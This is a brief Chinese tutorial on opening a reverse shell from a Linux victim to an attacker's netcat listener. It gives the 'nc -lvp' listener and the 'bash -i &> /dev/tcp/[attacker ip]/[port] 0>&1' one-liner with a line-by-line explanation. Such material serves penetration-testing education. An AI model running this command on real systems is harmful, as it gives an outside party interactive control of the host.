用bash反弹shell
受害主机;linux系统
攻击机:需要安装netcat(nc)
受害主机执行:ifconfig ## 查看受害主机ip
攻击机执行:nc -lvp 19999 ## 在攻击机监听19999端口
受害主机执行:bash -i &> /dev/tcp/[攻击机ip]/[攻击机监听端口] 0>&1 ##反弹shell,bash是linux shell的一种,-i是指创建一个交互式的shell,&>是指将正确错误的输入输出都输到文件里,不显示在终端,/dev/tcp 是linux中的一个特殊文件: /dev/tcp ,打开这个文件就类似于发出了一个socket调用,建立一个socket连接,读写这个文件就相当于在这个socket连接中传输数据,0>&1 的意思是将标准输入重定向到标准输出
攻击机得到反弹的shell
原创文章,作者:ItWorker,如若转载,请注明出处:https://blog.ytso.com/288291.html